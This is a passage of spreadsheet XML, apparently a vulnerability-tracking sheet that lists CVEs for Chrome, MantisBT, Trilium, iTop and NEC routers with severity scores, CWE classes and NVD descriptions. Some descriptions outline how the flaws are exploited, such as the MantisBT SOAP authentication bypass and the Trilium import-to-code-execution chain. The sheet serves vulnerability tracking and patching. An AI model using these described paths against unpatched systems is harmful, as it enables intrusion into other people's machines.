      </c>
      <c r="S98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87607</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87609</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr">
        <is>
          <t>apple:iphone_os, google:chrome</t>
        </is>
      </c>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr"/>
      <c r="Q99" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>Use after free in Sharing in Google Chrome on on iOS prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87609</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87621</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr"/>
      <c r="Q100" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87621</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87634</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr"/>
      <c r="Q101" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>Use after free in WebPackaging in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87634</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87637</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr"/>
      <c r="Q102" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>Use after free in Extensions in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87637</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87638</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr"/>
      <c r="K103" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr"/>
      <c r="Q103" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in Media in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87638</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87643</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr"/>
      <c r="Q104" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>Integer overflow in GPU in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87643</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87646</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr"/>
      <c r="K105" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr"/>
      <c r="Q105" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>Use after free in Web Authentication in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87646</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87650</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr"/>
      <c r="Q106" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in WebGL in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87650</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87654</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr"/>
      <c r="Q107" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87654</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39975</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr"/>
      <c r="Q108" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web-based IT service management tool. Prior to 3.2.3, unauthenticated users could delete the .readonly file on iTop instances, leading to code execution. This file, created during the setup process, prevents users from performing write actions. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39975</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16876</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>psirt-info@cyber.jp.nec.com</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr"/>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr"/>
      <c r="Q109" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>An authentication bypass vulnerability exists in the WebGUI of Series UNIVERGE IX-R/IX-V. A user could bypass authentication and execute arbitrary CLI commands by tampering with WebGUI messages and sending them to the device via internet.</t>
        </is>
      </c>
      <c r="S109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16876</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47156</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr"/>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr"/>
      <c r="Q110" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-639</t>
        </is>
      </c>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>MantisBT is an open source bug tracker. Versions 2.28.3 and earlier contain a critical authentication bypass in the SOAP API's mci_check_login() function. Any user knowing any valid cookie_string can authenticate as any other user (knowing their username), including the administrator, without knowing the target's password. The vulnerability is exploitable with zero prior access on default MantisBT installations because self-registration is enabled by default ($g_allow_signup = ON). A self-registered user can use their own cookie_string (readable from their browser's MANTIS_STRING_COOKIE cookie after login) to impersonate the administrator via the SOAP API. The REST API is NOT affected. The REST API's AuthMiddleware derives the username server-side from the API token or session cookie, so the username cannot be spoofed. The Web UI is NOT affected. The Web UI authenticates via PHP session cookies (PHPSESSID) and validates the MANTIS_STRING_COOKIE against the logged-in user through auth_is_cookie_valid(). The username is derived server-side from the cookie, not supplied by the client. Version 2.28.4 contains a patch. No known workarounds are available.</t>
        </is>
      </c>
      <c r="S110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47156</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48996</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr"/>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr"/>
      <c r="Q111" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the default-on "Safe import" filter does not sanitize note titles, and the GeoMap note view interpolates a marker note's title into raw HTML that is rendered as innerHTML, allowing an attacker-supplied import archive to inject script that runs when the map is displayed. Because Safe import neutralizes scripts but never escapes titles, a note whose title contains an HTML event-handler payload survives the import and executes as soon as the victim opens the GeoMap that renders its marker. On the desktop client the Electron renderer runs with Node integration enabled, so the injected JavaScript escalates from cross-site scripting to full remote code execution on the victim's machine. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="S111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48996</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51106</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr"/>
      <c r="Q112" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-502</t>
        </is>
      </c>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>An issue in TokTok qTox v1.18.4 allows a local attacker to cause a denial of service via the src/persistence/serialize.cpp component</t>
        </is>
      </c>
      <c r="S112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51106</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53578</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr"/>
      <c r="Q113" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the default-on "Safe import" filter sanitizes HTML only for text notes and excludes the mindMap note type, whose JSON content is stored without sanitization, allowing an attacker-supplied import archive to embed a payload that renders as arbitrary HTML. A mind map node can carry a dangerouslySetInnerHTML property that the Mind Elixir library assigns directly to a node's innerHTML, so a malicious note survives Safe import and executes script as soon as the victim opens the imported mind map. On the desktop client the Electron renderer runs with Node integration enabled, so the injected JavaScript escalates from cross-site scripting to full remote code execution on the victim's machine. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="S113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53578</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53579</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr"/>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr"/>
      <c r="Q114" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the default-on "Safe import" filter sanitizes HTML only for text notes and excludes the book note type, whose content is stored without sanitization and later rendered as HTML, allowing an attacker-supplied import archive to embed a payload that executes as script. A book note's content is routed through the same rendering path as text notes and injected into the page with jQuery's html method when the note is shown as a grid-view preview card, so a malicious note survives Safe import and runs as soon as the victim opens the containing note. On the desktop client the Electron renderer runs with Node integration enabled, so the injected JavaScript escalates from cross-site scripting to full remote code execution on the victim's machine. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="S114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53579</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53670</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
